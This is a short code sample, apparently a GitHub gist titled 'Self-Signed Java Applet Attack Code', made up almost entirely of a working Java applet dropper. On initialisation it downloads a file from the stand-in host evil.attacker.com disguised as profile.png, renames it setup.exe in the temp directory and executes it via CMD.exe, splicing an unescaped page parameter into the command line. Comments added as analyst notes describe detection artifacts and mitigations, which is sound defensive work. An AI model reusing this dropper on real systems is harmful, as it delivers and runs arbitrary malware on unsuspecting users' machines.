@phikshun
Created May 4, 2012 00:49
Self-Signed Java Applet Attack Code
import java.io.*;
import java.net.*;
import java.applet.*;
/**
 * Applet sample whose {@code init()} fetches a file over plain HTTP, writes it to the JVM
 * temp directory as profile.png, renames it to setup.exe and starts it through CMD.exe.
 *
 * Analyst notes (defensive reading of the sample):
 * - File writes and Runtime.exec() are not permitted to a sandboxed applet. The page title
 *   describes this as a self-signed applet, so it presumably depends on the user accepting
 *   the signed-applet trust prompt -- the embedding HTML and the JAR signature are not shown.
 * - Host-side artifacts visible in this code: profile.png and then setup.exe created in
 *   java.io.tmpdir, and a CMD.exe process created by the JVM that hosts the applet.
 * - Network-side artifact visible in this code: an unencrypted HTTP GET for a ".png" resource
 *   issued by the JVM; the payload is later executed, so it is presumably not an image.
 * - Mitigation context: later Java releases block self-signed applets by default and the
 *   Applet API has since been deprecated; removing or disabling the browser Java plug-in
 *   removes this delivery path.
 */
public class Plugin extends Applet {
/**
 * Runs the whole download / rename / execute sequence as soon as the applet is initialised.
 * Any failure is caught at the end and only printed, so nothing is surfaced to the page.
 */
public void init() {
// Handle of the spawned process; assigned below and never read afterwards.
Process f;
try {
// Stage 1: open the remote resource. The URL is hard-coded and uses http://, so the
// request and the response body are visible to network inspection.
java.io.BufferedInputStream in = new java.io.BufferedInputStream(new
java.net.URL("http://evil.attacker.com/profile.png").openStream());
// Stage 2: write the response under an image file name in the temp directory.
java.io.FileOutputStream fos = new java.io.FileOutputStream(System.getProperty("java.io.tmpdir") + File.separator + "profile.png");
java.io.BufferedOutputStream bout = new BufferedOutputStream(fos,1024);
byte[] data = new byte[1024];
int x=0;
// Copy in 1024-byte chunks until read() reports end of stream (-1).
while((x=in.read(data,0,1024))>=0) {
bout.write(data,0,x);
}
// Streams are closed only on this success path; an exception above skips both calls.
bout.close();
in.close();
// Stage 3: rename profile.png to setup.exe inside the same temp directory. A file whose
// extension changes from an image type to .exe in a temp directory is a useful
// file-monitoring signal.
File file = new File(System.getProperty("java.io.tmpdir") + File.separator + "profile.png");
File dir = new File(System.getProperty("java.io.tmpdir"));
boolean success = file.renameTo(new File(dir, "setup.exe"));
if (!success) {
// File was not successfully moved
// The failure is ignored: execution continues to the exec() call regardless.
}
// Stage 4: read the "cookie" applet parameter, which is supplied by the page that embeds
// the applet (null if the page does not set it).
String cookie = getParameter("cookie");
// The parameter is concatenated, unescaped, into the command line handed to CMD.exe, so
// the embedding page controls part of that command line. For responders this means the
// value appears verbatim in process-creation logs that record command lines.
f = Runtime.getRuntime().exec("CMD.exe /c \"" + System.getProperty("java.io.tmpdir") + File.separator + "setup.exe -c " + cookie + "\"");
} catch(Exception e) {
// Catch-all: download, file and exec errors are all reduced to a printed stack trace.
e.printStackTrace();
}
}
}